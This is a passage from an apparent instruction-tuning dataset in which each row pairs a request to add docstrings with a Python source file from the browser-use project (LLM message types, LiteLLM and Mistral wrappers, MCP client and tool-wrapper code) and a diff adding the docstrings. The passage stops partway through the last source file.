instruction stringclasses 100
values | code stringlengths 78 193k | response stringlengths 259 170k | file stringlengths 59 203 |
|---|---|---|---|
Add docstrings explaining edge cases |
# region - Content parts
from typing import Literal, Union
from pydantic import BaseModel
def _truncate(text: str, max_length: int = 50) -> str:
if len(text) <= max_length:
return text
return text[: max_length - 3] + '...'
def _format_image_url(url: str, max_length: int = 50) -> str:
if url.startswith('data:'):
# Base64 image
media_type = url.split(';')[0].split(':')[1] if ';' in url else 'image'
return f'<base64 {media_type}>'
else:
# Regular URL
return _truncate(url, max_length)
class ContentPartTextParam(BaseModel):
text: str
type: Literal['text'] = 'text'
def __str__(self) -> str:
return f'Text: {_truncate(self.text)}'
def __repr__(self) -> str:
return f'ContentPartTextParam(text={_truncate(self.text)})'
class ContentPartRefusalParam(BaseModel):
refusal: str
type: Literal['refusal'] = 'refusal'
def __str__(self) -> str:
return f'Refusal: {_truncate(self.refusal)}'
def __repr__(self) -> str:
return f'ContentPartRefusalParam(refusal={_truncate(repr(self.refusal), 50)})'
SupportedImageMediaType = Literal['image/jpeg', 'image/png', 'image/gif', 'image/webp']
class ImageURL(BaseModel):
url: str
"""Either a URL of the image or the base64 encoded image data."""
detail: Literal['auto', 'low', 'high'] = 'auto'
"""Specifies the detail level of the image.
Learn more in the
[Vision guide](https://platform.openai.com/docs/guides/vision#low-or-high-fidelity-image-understanding).
"""
# needed for Anthropic
media_type: SupportedImageMediaType = 'image/png'
def __str__(self) -> str:
url_display = _format_image_url(self.url)
return f'🖼️ Image[{self.media_type}, detail={self.detail}]: {url_display}'
def __repr__(self) -> str:
url_repr = _format_image_url(self.url, 30)
return f'ImageURL(url={repr(url_repr)}, detail={repr(self.detail)}, media_type={repr(self.media_type)})'
class ContentPartImageParam(BaseModel):
image_url: ImageURL
type: Literal['image_url'] = 'image_url'
def __str__(self) -> str:
return str(self.image_url)
def __repr__(self) -> str:
return f'ContentPartImageParam(image_url={repr(self.image_url)})'
class Function(BaseModel):
arguments: str
"""
The arguments to call the function with, as generated by the model in JSON
format. Note that the model does not always generate valid JSON, and may
hallucinate parameters not defined by your function schema. Validate the
arguments in your code before calling your function.
"""
name: str
"""The name of the function to call."""
def __str__(self) -> str:
args_preview = _truncate(self.arguments, 80)
return f'{self.name}({args_preview})'
def __repr__(self) -> str:
args_repr = _truncate(repr(self.arguments), 50)
return f'Function(name={repr(self.name)}, arguments={args_repr})'
class ToolCall(BaseModel):
id: str
"""The ID of the tool call."""
function: Function
"""The function that the model called."""
type: Literal['function'] = 'function'
"""The type of the tool. Currently, only `function` is supported."""
def __str__(self) -> str:
return f'ToolCall[{self.id}]: {self.function}'
def __repr__(self) -> str:
return f'ToolCall(id={repr(self.id)}, function={repr(self.function)})'
# endregion
# region - Message types
class _MessageBase(BaseModel):
role: Literal['user', 'system', 'assistant']
cache: bool = False
"""Whether to cache this message. This is only applicable when using Anthropic models.
"""
class UserMessage(_MessageBase):
role: Literal['user'] = 'user'
"""The role of the messages author, in this case `user`."""
content: str | list[ContentPartTextParam | ContentPartImageParam]
"""The contents of the user message."""
name: str | None = None
"""An optional name for the participant.
Provides the model information to differentiate between participants of the same
role.
"""
@property
def text(self) -> str:
if isinstance(self.content, str):
return self.content
elif isinstance(self.content, list):
return '\n'.join([part.text for part in self.content if part.type == 'text'])
else:
return ''
def __str__(self) -> str:
return f'UserMessage(content={self.text})'
def __repr__(self) -> str:
return f'UserMessage(content={repr(self.text)})'
class SystemMessage(_MessageBase):
role: Literal['system'] = 'system'
"""The role of the messages author, in this case `system`."""
content: str | list[ContentPartTextParam]
"""The contents of the system message."""
name: str | None = None
@property
def text(self) -> str:
if isinstance(self.content, str):
return self.content
elif isinstance(self.content, list):
return '\n'.join([part.text for part in self.content if part.type == 'text'])
else:
return ''
def __str__(self) -> str:
return f'SystemMessage(content={self.text})'
def __repr__(self) -> str:
return f'SystemMessage(content={repr(self.text)})'
class AssistantMessage(_MessageBase):
role: Literal['assistant'] = 'assistant'
"""The role of the messages author, in this case `assistant`."""
content: str | list[ContentPartTextParam | ContentPartRefusalParam] | None
"""The contents of the assistant message."""
name: str | None = None
refusal: str | None = None
"""The refusal message by the assistant."""
tool_calls: list[ToolCall] = []
"""The tool calls generated by the model, such as function calls."""
@property
def text(self) -> str:
if isinstance(self.content, str):
return self.content
elif isinstance(self.content, list):
text = ''
for part in self.content:
if part.type == 'text':
text += part.text
elif part.type == 'refusal':
text += f'[Refusal] {part.refusal}'
return text
else:
return ''
def __str__(self) -> str:
return f'AssistantMessage(content={self.text})'
def __repr__(self) -> str:
return f'AssistantMessage(content={repr(self.text)})'
BaseMessage = Union[UserMessage, SystemMessage, AssistantMessage]
# endregion | --- +++ @@ -1,3 +1,6 @@+"""
+This implementation is based on the OpenAI types, while removing all the parts that are not needed for Browser Use.
+"""
# region - Content parts
from typing import Literal, Union
@@ -6,12 +9,14 @@
def _truncate(text: str, max_length: int = 50) -> str:
+ """Truncate text to max_length characters, adding ellipsis if truncated."""
if len(text) <= max_length:
return text
return text[: max_length - 3] + '...'
def _format_image_url(url: str, max_length: int = 50) -> str:
+ """Format image URL for display, truncating if necessary."""
if url.startswith('data:'):
# Base64 image
media_type = url.split(';')[0].split(':')[1] if ';' in url else 'image'
@@ -118,6 +123,7 @@
# region - Message types
class _MessageBase(BaseModel):
+ """Base class for all message types"""
role: Literal['user', 'system', 'assistant']
@@ -142,6 +148,9 @@
@property
def text(self) -> str:
+ """
+ Automatically parse the text inside content, whether it's a string or a list of content parts.
+ """
if isinstance(self.content, str):
return self.content
elif isinstance(self.content, list):
@@ -167,6 +176,9 @@
@property
def text(self) -> str:
+ """
+ Automatically parse the text inside content, whether it's a string or a list of content parts.
+ """
if isinstance(self.content, str):
return self.content
elif isinstance(self.content, list):
@@ -198,6 +210,9 @@
@property
def text(self) -> str:
+ """
+ Automatically parse the text inside content, whether it's a string or a list of content parts.
+ """
if isinstance(self.content, str):
return self.content
elif isinstance(self.content, list):
@@ -220,4 +235,4 @@
BaseMessage = Union[UserMessage, SystemMessage, AssistantMessage]
-# endregion+# endregion
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/messages.py |
Write docstrings for data processing functions |
from browser_use.mcp.client import MCPClient
from browser_use.mcp.controller import MCPToolWrapper
__all__ = ['MCPClient', 'MCPToolWrapper', 'BrowserUseServer'] # type: ignore
def __getattr__(name):
if name == 'BrowserUseServer':
from browser_use.mcp.server import BrowserUseServer
return BrowserUseServer
raise AttributeError(f"module '{__name__}' has no attribute '{name}'") | --- +++ @@ -1,3 +1,7 @@+"""MCP (Model Context Protocol) support for browser-use.
+
+This module provides integration with MCP servers and clients for browser automation.
+"""
from browser_use.mcp.client import MCPClient
from browser_use.mcp.controller import MCPToolWrapper
@@ -6,8 +10,9 @@
def __getattr__(name):
+ """Lazy import to avoid importing server module when only client is needed."""
if name == 'BrowserUseServer':
from browser_use.mcp.server import BrowserUseServer
return BrowserUseServer
- raise AttributeError(f"module '{__name__}' has no attribute '{name}'")+ raise AttributeError(f"module '{__name__}' has no attribute '{name}'")
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/mcp/__init__.py |
Can you add docstrings to this Python file? | import logging
from dataclasses import dataclass, field
from typing import Any, TypeVar, overload
from pydantic import BaseModel
from browser_use.llm.base import BaseChatModel
from browser_use.llm.exceptions import ModelProviderError, ModelRateLimitError
from browser_use.llm.messages import BaseMessage
from browser_use.llm.schema import SchemaOptimizer
from browser_use.llm.views import ChatInvokeCompletion, ChatInvokeUsage
from .serializer import LiteLLMMessageSerializer
logger = logging.getLogger(__name__)
T = TypeVar('T', bound=BaseModel)
@dataclass
class ChatLiteLLM(BaseChatModel):
model: str
api_key: str | None = None
api_base: str | None = None
temperature: float | None = 0.0
max_tokens: int | None = 4096
max_retries: int = 3
metadata: dict[str, Any] | None = None
_provider_name: str = field(default='', init=False, repr=False)
_clean_model: str = field(default='', init=False, repr=False)
def __post_init__(self) -> None:
try:
from litellm import get_llm_provider
self._clean_model, self._provider_name, _, _ = get_llm_provider(self.model)
except Exception:
if '/' in self.model:
self._provider_name, self._clean_model = self.model.split('/', 1)
else:
self._provider_name = 'openai'
self._clean_model = self.model
logger.debug(
'ChatLiteLLM initialized: model=%s, provider=%s, clean=%s, api_base=%s',
self.model,
self._provider_name,
self._clean_model,
self.api_base or '(default)',
)
@property
def provider(self) -> str:
return self._provider_name or 'litellm'
@property
def name(self) -> str:
return self._clean_model or self.model
@staticmethod
def _parse_usage(response: Any) -> ChatInvokeUsage | None:
usage = getattr(response, 'usage', None)
if usage is None:
return None
prompt_tokens = getattr(usage, 'prompt_tokens', 0) or 0
completion_tokens = getattr(usage, 'completion_tokens', 0) or 0
prompt_cached = getattr(usage, 'cache_read_input_tokens', None)
cache_creation = getattr(usage, 'cache_creation_input_tokens', None)
if prompt_cached is None:
details = getattr(usage, 'prompt_tokens_details', None)
if details:
prompt_cached = getattr(details, 'cached_tokens', None)
return ChatInvokeUsage(
prompt_tokens=prompt_tokens,
prompt_cached_tokens=int(prompt_cached) if prompt_cached is not None else None,
prompt_cache_creation_tokens=int(cache_creation) if cache_creation is not None else None,
prompt_image_tokens=None,
completion_tokens=completion_tokens,
total_tokens=prompt_tokens + completion_tokens,
)
@overload
async def ainvoke(
self,
messages: list[BaseMessage],
output_format: None = None,
**kwargs: Any,
) -> ChatInvokeCompletion[str]: ...
@overload
async def ainvoke(
self,
messages: list[BaseMessage],
output_format: type[T],
**kwargs: Any,
) -> ChatInvokeCompletion[T]: ...
async def ainvoke(
self,
messages: list[BaseMessage],
output_format: type[T] | None = None,
**kwargs: Any,
) -> ChatInvokeCompletion[T] | ChatInvokeCompletion[str]:
from litellm import acompletion
from litellm.exceptions import APIConnectionError, APIError, RateLimitError, Timeout
from litellm.types.utils import ModelResponse
litellm_messages = LiteLLMMessageSerializer.serialize(messages)
params: dict[str, Any] = {
'model': self.model,
'messages': litellm_messages,
'num_retries': self.max_retries,
}
if self.temperature is not None:
params['temperature'] = self.temperature
if self.max_tokens is not None:
params['max_tokens'] = self.max_tokens
if self.api_key:
params['api_key'] = self.api_key
if self.api_base:
params['api_base'] = self.api_base
if self.metadata:
params['metadata'] = self.metadata
if output_format is not None:
schema = SchemaOptimizer.create_optimized_json_schema(output_format)
params['response_format'] = {
'type': 'json_schema',
'json_schema': {
'name': 'agent_output',
'strict': True,
'schema': schema,
},
}
try:
raw_response = await acompletion(**params)
except RateLimitError as e:
raise ModelRateLimitError(
message=str(e),
model=self.name,
) from e
except Timeout as e:
raise ModelProviderError(
message=f'Request timed out: {e}',
model=self.name,
) from e
except APIConnectionError as e:
raise ModelProviderError(
message=str(e),
model=self.name,
) from e
except APIError as e:
status = getattr(e, 'status_code', 502) or 502
raise ModelProviderError(
message=str(e),
status_code=status,
model=self.name,
) from e
except ModelProviderError:
raise
except Exception as e:
raise ModelProviderError(
message=str(e),
model=self.name,
) from e
assert isinstance(raw_response, ModelResponse), f'Expected ModelResponse, got {type(raw_response)}'
response: ModelResponse = raw_response
choice = response.choices[0] if response.choices else None
if choice is None:
raise ModelProviderError(
message='Empty response: no choices returned by the model',
status_code=502,
model=self.name,
)
content = choice.message.content or ''
usage = self._parse_usage(response)
stop_reason = choice.finish_reason
thinking: str | None = None
msg_obj = choice.message
reasoning = getattr(msg_obj, 'reasoning_content', None)
if reasoning:
thinking = str(reasoning)
if output_format is not None:
if not content:
raise ModelProviderError(
message='Model returned empty content for structured output request',
status_code=500,
model=self.name,
)
parsed = output_format.model_validate_json(content)
return ChatInvokeCompletion(
completion=parsed,
thinking=thinking,
usage=usage,
stop_reason=stop_reason,
)
return ChatInvokeCompletion(
completion=content,
thinking=thinking,
usage=usage,
stop_reason=stop_reason,
) | --- +++ @@ -31,6 +31,7 @@ _clean_model: str = field(default='', init=False, repr=False)
def __post_init__(self) -> None:
+ """Resolve provider info from the model string via litellm."""
try:
from litellm import get_llm_provider
@@ -60,6 +61,7 @@
@staticmethod
def _parse_usage(response: Any) -> ChatInvokeUsage | None:
+ """Extract token usage from a litellm response."""
usage = getattr(response, 'usage', None)
if usage is None:
return None
@@ -213,4 +215,4 @@ thinking=thinking,
usage=usage,
stop_reason=stop_reason,
- )+ )
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/litellm/chat.py |
Replace inline comments with docstrings |
from __future__ import annotations
from typing import Any
from pydantic import BaseModel
from browser_use.llm.schema import SchemaOptimizer
class MistralSchemaOptimizer:
UNSUPPORTED_KEYWORDS = {'minLength', 'maxLength', 'pattern', 'format'}
@classmethod
def create_mistral_compatible_schema(cls, model: type[BaseModel]) -> dict[str, Any]:
base_schema = SchemaOptimizer.create_optimized_json_schema(model)
return cls._strip_unsupported_keywords(base_schema)
@classmethod
def _strip_unsupported_keywords(cls, obj: Any) -> Any:
if isinstance(obj, dict):
return {
key: cls._strip_unsupported_keywords(value) for key, value in obj.items() if key not in cls.UNSUPPORTED_KEYWORDS
}
if isinstance(obj, list):
return [cls._strip_unsupported_keywords(item) for item in obj]
return obj | --- +++ @@ -1,3 +1,4 @@+"""Schema optimizer for Mistral-compatible JSON schemas."""
from __future__ import annotations
@@ -9,11 +10,16 @@
class MistralSchemaOptimizer:
+ """Create JSON schemas that avoid Mistral's unsupported keywords."""
UNSUPPORTED_KEYWORDS = {'minLength', 'maxLength', 'pattern', 'format'}
@classmethod
def create_mistral_compatible_schema(cls, model: type[BaseModel]) -> dict[str, Any]:
+ """
+ Build a Mistral-safe schema by starting with the standard optimized schema and
+ then stripping unsupported validation keywords recursively.
+ """
base_schema = SchemaOptimizer.create_optimized_json_schema(model)
return cls._strip_unsupported_keywords(base_schema)
@@ -25,4 +31,4 @@ }
if isinstance(obj, list):
return [cls._strip_unsupported_keywords(item) for item in obj]
- return obj+ return obj
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/llm/mistral/schema.py |
Add standardized docstrings across the file |
import asyncio
import logging
from typing import Any
from pydantic import Field, create_model
from browser_use.agent.views import ActionResult
from browser_use.tools.registry.service import Registry
logger = logging.getLogger(__name__)
try:
from mcp import ClientSession, StdioServerParameters
from mcp.client.stdio import stdio_client
from mcp.types import TextContent, Tool
MCP_AVAILABLE = True
except ImportError:
MCP_AVAILABLE = False
logger.warning('MCP SDK not installed. Install with: pip install mcp')
class MCPToolWrapper:
def __init__(self, registry: Registry, mcp_command: str, mcp_args: list[str] | None = None):
if not MCP_AVAILABLE:
raise ImportError('MCP SDK not installed. Install with: pip install mcp')
self.registry = registry
self.mcp_command = mcp_command
self.mcp_args = mcp_args or []
self.session: ClientSession | None = None
self._tools: dict[str, Tool] = {}
self._registered_actions: set[str] = set()
self._shutdown_event = asyncio.Event()
async def connect(self):
if self.session:
return # Already connected
logger.info(f'🔌 Connecting to MCP server: {self.mcp_command} {" ".join(self.mcp_args)}')
# Create server parameters
server_params = StdioServerParameters(command=self.mcp_command, args=self.mcp_args, env=None)
# Connect to the MCP server
async with stdio_client(server_params) as (read, write):
async with ClientSession(read, write) as session:
self.session = session
# Initialize the connection
await session.initialize()
# Discover available tools
tools_response = await session.list_tools()
self._tools = {tool.name: tool for tool in tools_response.tools}
logger.info(f'📦 Discovered {len(self._tools)} MCP tools: {list(self._tools.keys())}')
# Register all discovered tools as actions
for tool_name, tool in self._tools.items():
self._register_tool_as_action(tool_name, tool)
# Keep session alive while tools are being used
await self._keep_session_alive()
async def _keep_session_alive(self):
# This will block until the session is closed
# In practice, you'd want to manage this lifecycle better
try:
await self._shutdown_event.wait()
except asyncio.CancelledError:
pass
def _register_tool_as_action(self, tool_name: str, tool: Tool):
if tool_name in self._registered_actions:
return # Already registered
# Parse tool parameters to create Pydantic model
param_fields = {}
if tool.inputSchema:
# MCP tools use JSON Schema for parameters
properties = tool.inputSchema.get('properties', {})
required = set(tool.inputSchema.get('required', []))
for param_name, param_schema in properties.items():
# Convert JSON Schema type to Python type
param_type = self._json_schema_to_python_type(param_schema)
# Determine if field is required
if param_name in required:
default = ... # Required field
else:
default = param_schema.get('default', None)
# Add field description if available
field_kwargs = {}
if 'description' in param_schema:
field_kwargs['description'] = param_schema['description']
param_fields[param_name] = (param_type, Field(default, **field_kwargs))
# Create Pydantic model for the tool parameters
param_model = create_model(f'{tool_name}_Params', **param_fields) if param_fields else None
# Determine if this is a browser-specific tool
is_browser_tool = tool_name.startswith('browser_')
domains = None
# Note: page_filter has been removed since we no longer use Page objects
# Create wrapper function for the MCP tool
async def mcp_action_wrapper(**kwargs):
if not self.session:
raise RuntimeError(f'MCP session not connected for tool {tool_name}')
# Extract parameters (excluding special injected params)
special_params = {
'page',
'browser_session',
'context',
'page_extraction_llm',
'file_system',
'available_file_paths',
'has_sensitive_data',
'browser',
'browser_context',
}
tool_params = {k: v for k, v in kwargs.items() if k not in special_params}
logger.debug(f'🔧 Calling MCP tool {tool_name} with params: {tool_params}')
try:
# Call the MCP tool
result = await self.session.call_tool(tool_name, tool_params)
# Convert MCP result to ActionResult
# MCP tools return results in various formats
if hasattr(result, 'content'):
# Handle structured content responses
if isinstance(result.content, list):
# Multiple content items
content_parts = []
for item in result.content:
if isinstance(item, TextContent):
content_parts.append(item.text) # type: ignore[reportAttributeAccessIssue]
else:
content_parts.append(str(item))
extracted_content = '\n'.join(content_parts)
else:
extracted_content = str(result.content)
else:
# Direct result
extracted_content = str(result)
return ActionResult(extracted_content=extracted_content)
except Exception as e:
logger.error(f'❌ MCP tool {tool_name} failed: {e}')
return ActionResult(extracted_content=f'MCP tool {tool_name} failed: {str(e)}', error=str(e))
# Set function name for better debugging
mcp_action_wrapper.__name__ = tool_name
mcp_action_wrapper.__qualname__ = f'mcp.{tool_name}'
# Register the action with browser-use
description = tool.description or f'MCP tool: {tool_name}'
# Use the decorator to register the action
decorated_wrapper = self.registry.action(description=description, param_model=param_model, domains=domains)(
mcp_action_wrapper
)
self._registered_actions.add(tool_name)
logger.info(f'✅ Registered MCP tool as action: {tool_name}')
async def disconnect(self):
self._shutdown_event.set()
if self.session:
# Session cleanup will be handled by the context manager
self.session = None
def _json_schema_to_python_type(self, schema: dict) -> Any:
json_type = schema.get('type', 'string')
type_mapping = {
'string': str,
'number': float,
'integer': int,
'boolean': bool,
'array': list,
'object': dict,
}
base_type = type_mapping.get(json_type, str)
# Handle nullable types
if schema.get('nullable', False):
return base_type | None
return base_type
# Convenience function for easy integration
async def register_mcp_tools(registry: Registry, mcp_command: str, mcp_args: list[str] | None = None) -> MCPToolWrapper:
wrapper = MCPToolWrapper(registry, mcp_command, mcp_args)
await wrapper.connect()
return wrapper | --- +++ @@ -1,3 +1,8 @@+"""MCP (Model Context Protocol) tool wrapper for browser-use.
+
+This module provides integration between MCP tools and browser-use's action registry system.
+MCP tools are dynamically discovered and registered as browser-use actions.
+"""
import asyncio
import logging
@@ -22,8 +27,16 @@
class MCPToolWrapper:
+ """Wrapper to integrate MCP tools as browser-use actions."""
def __init__(self, registry: Registry, mcp_command: str, mcp_args: list[str] | None = None):
+ """Initialize MCP tool wrapper.
+
+ Args:
+ registry: Browser-use action registry to register MCP tools
+ mcp_command: Command to start MCP server (e.g., "npx")
+ mcp_args: Arguments for MCP command (e.g., ["@playwright/mcp@latest"])
+ """
if not MCP_AVAILABLE:
raise ImportError('MCP SDK not installed. Install with: pip install mcp')
@@ -36,6 +49,7 @@ self._shutdown_event = asyncio.Event()
async def connect(self):
+ """Connect to MCP server and discover available tools."""
if self.session:
return # Already connected
@@ -66,6 +80,7 @@ await self._keep_session_alive()
async def _keep_session_alive(self):
+ """Keep the MCP session alive."""
# This will block until the session is closed
# In practice, you'd want to manage this lifecycle better
try:
@@ -74,6 +89,12 @@ pass
def _register_tool_as_action(self, tool_name: str, tool: Tool):
+ """Register an MCP tool as a browser-use action.
+
+ Args:
+ tool_name: Name of the MCP tool
+ tool: MCP Tool object with schema information
+ """
if tool_name in self._registered_actions:
return # Already registered
@@ -112,6 +133,7 @@
# Create wrapper function for the MCP tool
async def mcp_action_wrapper(**kwargs):
+ """Wrapper function that calls the MCP tool."""
if not self.session:
raise RuntimeError(f'MCP session not connected for tool {tool_name}')
@@ -177,12 +199,21 @@ logger.info(f'✅ Registered MCP tool as action: {tool_name}')
async def disconnect(self):
+ """Disconnect from the MCP server and clean up resources."""
self._shutdown_event.set()
if self.session:
# Session cleanup will be handled by the context manager
self.session = None
def _json_schema_to_python_type(self, schema: dict) -> Any:
+ """Convert JSON Schema type to Python type.
+
+ Args:
+ schema: JSON Schema definition
+
+ Returns:
+ Python type corresponding to the schema
+ """
json_type = schema.get('type', 'string')
type_mapping = {
@@ -205,6 +236,29 @@
# Convenience function for easy integration
async def register_mcp_tools(registry: Registry, mcp_command: str, mcp_args: list[str] | None = None) -> MCPToolWrapper:
+ """Register MCP tools with a browser-use registry.
+
+ Args:
+ registry: Browser-use action registry
+ mcp_command: Command to start MCP server
+ mcp_args: Arguments for MCP command
+
+ Returns:
+ MCPToolWrapper instance (connected)
+
+ Example:
+ ```python
+ from browser_use import Tools
+ from browser_use.mcp.tools import register_mcp_tools
+
+ tools = Tools()
+
+ # Register Playwright MCP tools
+ mcp = await register_mcp_tools(tools.registry, 'npx', ['@playwright/mcp@latest', '--headless'])
+
+ # Now all MCP tools are available as browser-use actions
+ ```
+ """
wrapper = MCPToolWrapper(registry, mcp_command, mcp_args)
await wrapper.connect()
- return wrapper+ return wrapper
| https://raw.githubusercontent.com/browser-use/browser-use/HEAD/browser_use/mcp/controller.py |
Add concise docstrings to each method |
import asyncio
import logging
import time
from typing import Any
from pydantic import BaseModel, ConfigDict, Field, create_model
from browser_use.agent.views import ActionResult
from browser_use.telemetry import MCPClientTelemetryEvent, ProductTelemetry
from browser_use.tools.registry.service import Registry
from browser_use.tools.service import Tools
from browser_use.utils import create_task_with_error_handling, get_browser_use_version
logger = logging.getLogger(__name__)
# Import MCP SDK
from mcp import ClientSession, StdioServerParameters, types
from mcp.client.stdio import stdio_client
MCP_AVAILABLE = True
class MCPClient:
def __init__(
self,
server_name: str,
command: str,
args: list[str] | None = None,
env: dict[str, str] | None = None,
):
self.server_name = server_name
self.command = command
self.args = args or []
self.env = env
self.session: ClientSession | None = None
self._stdio_task = None
self._read_stream = None
self._write_stream = None
self._tools: dict[str, types.Tool] = {}
self._registered_actions: set[str] = set()
self._connected = False
self._disconnect_event = asyncio.Event()
self._telemetry = ProductTelemetry()
async def connect(self) -> None:
if self._connected:
logger.debug(f'Already connected to {self.server_name}')
return
start_time = time.time()
error_msg = None
try:
logger.info(f"🔌 Connecting to MCP server '{self.server_name}': {self.command} {' '.join(self.args)}")
# Create server parameters
server_params = StdioServerParameters(command=self.command, args=self.args, env=self.env)
# Start stdio client in background task
self._stdio_task = create_task_with_error_handling(
self._run_stdio_client(server_params), name='mcp_stdio_client', suppress_exceptions=True
)
# Wait for connection to be established
retries = 0
max_retries = 100 # 10 second timeout (increased for parallel test execution)
while not self._connected and retries < max_retries:
await asyncio.sleep(0.1)
retries += 1
if not self._connected:
error_msg = f"Failed to connect to MCP server '{self.server_name}' after {max_retries * 0.1} seconds"
raise RuntimeError(error_msg)
logger.info(f"📦 Discovered {len(self._tools)} tools from '{self.server_name}': {list(self._tools.keys())}")
except Exception as e:
error_msg = str(e)
raise
finally:
# Capture telemetry for connect action
duration = time.time() - start_time
self._telemetry.capture(
MCPClientTelemetryEvent(
server_name=self.server_name,
command=self.command,
tools_discovered=len(self._tools),
version=get_browser_use_version(),
action='connect',
duration_seconds=duration,
error_message=error_msg,
)
)
async def _run_stdio_client(self, server_params: StdioServerParameters):
try:
async with stdio_client(server_params) as (read_stream, write_stream):
self._read_stream = read_stream
self._write_stream = write_stream
# Create and initialize session
async with ClientSession(read_stream, write_stream) as session:
self.session = session
# Initialize the connection
await session.initialize()
# Discover available tools
tools_response = await session.list_tools()
self._tools = {tool.name: tool for tool in tools_response.tools}
# Mark as connected
self._connected = True
# Keep the connection alive until disconnect is called
await self._disconnect_event.wait()
except Exception as e:
logger.error(f'MCP server connection error: {e}')
self._connected = False
raise
finally:
self._connected = False
self.session = None
async def disconnect(self) -> None:
if not self._connected:
return
start_time = time.time()
error_msg = None
try:
logger.info(f"🔌 Disconnecting from MCP server '{self.server_name}'")
# Signal disconnect
self._connected = False
self._disconnect_event.set()
# Wait for stdio task to finish
if self._stdio_task:
try:
await asyncio.wait_for(self._stdio_task, timeout=2.0)
except TimeoutError:
logger.warning(f"Timeout waiting for MCP server '{self.server_name}' to disconnect")
self._stdio_task.cancel()
try:
await self._stdio_task
except asyncio.CancelledError:
pass
self._tools.clear()
self._registered_actions.clear()
except Exception as e:
error_msg = str(e)
logger.error(f'Error disconnecting from MCP server: {e}')
finally:
# Capture telemetry for disconnect action
duration = time.time() - start_time
self._telemetry.capture(
MCPClientTelemetryEvent(
server_name=self.server_name,
command=self.command,
tools_discovered=0, # Tools cleared on disconnect
version=get_browser_use_version(),
action='disconnect',
duration_seconds=duration,
error_message=error_msg,
)
)
self._telemetry.flush()
async def register_to_tools(
self,
tools: Tools,
tool_filter: list[str] | None = None,
prefix: str | None = None,
) -> None:
if not self._connected:
await self.connect()
registry = tools.registry
for tool_name, tool in self._tools.items():
# Skip if not in filter
if tool_filter and tool_name not in tool_filter:
continue
# Apply prefix if specified
action_name = f'{prefix}{tool_name}' if prefix else tool_name
# Skip if already registered
if action_name in self._registered_actions:
continue
# Register the tool as an action
self._register_tool_as_action(registry, action_name, tool)
self._registered_actions.add(action_name)
logger.info(f"✅ Registered {len(self._registered_actions)} MCP tools from '{self.server_name}' as browser-use actions")
def _register_tool_as_action(self, registry: Registry, action_name: str, tool: Any) -> None:
# Parse tool parameters to create Pydantic model
param_fields = {}
if tool.inputSchema:
# MCP tools use JSON Schema for parameters
properties = tool.inputSchema.get('properties', {})
required = set(tool.inputSchema.get('required', []))
for param_name, param_schema in properties.items():
# Convert JSON Schema type to Python type
param_type = self._json_schema_to_python_type(param_schema, f'{action_name}_{param_name}')
# Determine if field is required and handle defaults
if param_name in required:
default = ... # Required field
else:
# Optional field - make type optional and handle default
param_type = param_type | None
if 'default' in param_schema:
default = param_schema['default']
else:
default = None
# Add field with description if available
field_kwargs = {}
if 'description' in param_schema:
field_kwargs['description'] = param_schema['description']
param_fields[param_name] = (param_type, Field(default, **field_kwargs))
# Create Pydantic model for the tool parameters
if param_fields:
# Create a BaseModel class with proper configuration
class ConfiguredBaseModel(BaseModel):
model_config = ConfigDict(extra='forbid', validate_by_name=True, validate_by_alias=True)
param_model = create_model(f'{action_name}_Params', __base__=ConfiguredBaseModel, **param_fields)
else:
# No parameters - create empty model
param_model = None
# Determine if this is a browser-specific tool
is_browser_tool = tool.name.startswith('browser_') or 'page' in tool.name.lower()
# Set up action filters
domains = None
# Note: page_filter has been removed since we no longer use Page objects
# Browser tools filtering would need to be done via domain filters instead
# Create async wrapper function for the MCP tool
# Need to define function with explicit parameters to satisfy registry validation
if param_model:
# Type 1: Function takes param model as first parameter
async def mcp_action_wrapper(params: param_model) -> ActionResult: # type: ignore[no-redef]
if not self.session or not self._connected:
return ActionResult(error=f"MCP server '{self.server_name}' not connected", success=False)
# Convert pydantic model to dict for MCP call
tool_params = params.model_dump(exclude_none=True)
logger.debug(f"🔧 Calling MCP tool '{tool.name}' with params: {tool_params}")
start_time = time.time()
error_msg = None
try:
# Call the MCP tool
result = await self.session.call_tool(tool.name, tool_params)
# Convert MCP result to ActionResult
extracted_content = self._format_mcp_result(result)
return ActionResult(
extracted_content=extracted_content,
long_term_memory=f"Used MCP tool '{tool.name}' from {self.server_name}",
include_extracted_content_only_once=True,
)
except Exception as e:
error_msg = f"MCP tool '{tool.name}' failed: {str(e)}"
logger.error(error_msg)
return ActionResult(error=error_msg, success=False)
finally:
# Capture telemetry for tool call
duration = time.time() - start_time
self._telemetry.capture(
MCPClientTelemetryEvent(
server_name=self.server_name,
command=self.command,
tools_discovered=len(self._tools),
version=get_browser_use_version(),
action='tool_call',
tool_name=tool.name,
duration_seconds=duration,
error_message=error_msg,
)
)
else:
# No parameters - empty function signature
async def mcp_action_wrapper() -> ActionResult: # type: ignore[no-redef]
if not self.session or not self._connected:
return ActionResult(error=f"MCP server '{self.server_name}' not connected", success=False)
logger.debug(f"🔧 Calling MCP tool '{tool.name}' with no params")
start_time = time.time()
error_msg = None
try:
# Call the MCP tool with empty params
result = await self.session.call_tool(tool.name, {})
# Convert MCP result to ActionResult
extracted_content = self._format_mcp_result(result)
return ActionResult(
extracted_content=extracted_content,
long_term_memory=f"Used MCP tool '{tool.name}' from {self.server_name}",
include_extracted_content_only_once=True,
)
except Exception as e:
error_msg = f"MCP tool '{tool.name}' failed: {str(e)}"
logger.error(error_msg)
return ActionResult(error=error_msg, success=False)
finally:
# Capture telemetry for tool call
duration = time.time() - start_time
self._telemetry.capture(
MCPClientTelemetryEvent(
server_name=self.server_name,
command=self.command,
tools_discovered=len(self._tools),
version=get_browser_use_version(),
action='tool_call',
tool_name=tool.name,
duration_seconds=duration,
error_message=error_msg,
)
)
# Set function metadata for better debugging
mcp_action_wrapper.__name__ = action_name
mcp_action_wrapper.__qualname__ = f'mcp.{self.server_name}.{action_name}'
# Register the action with browser-use
description = tool.description or f'MCP tool from {self.server_name}: {tool.name}'
# Use the registry's action decorator
registry.action(description=description, param_model=param_model, domains=domains)(mcp_action_wrapper)
logger.debug(f"✅ Registered MCP tool '{tool.name}' as action '{action_name}'")
def _format_mcp_result(self, result: Any) -> str:
# Handle different MCP result formats
if hasattr(result, 'content'):
# Structured content response
if isinstance(result.content, list):
# Multiple content items
parts = []
for item in result.content:
if hasattr(item, 'text'):
parts.append(item.text)
elif hasattr(item, 'type') and item.type == 'text':
parts.append(str(item))
else:
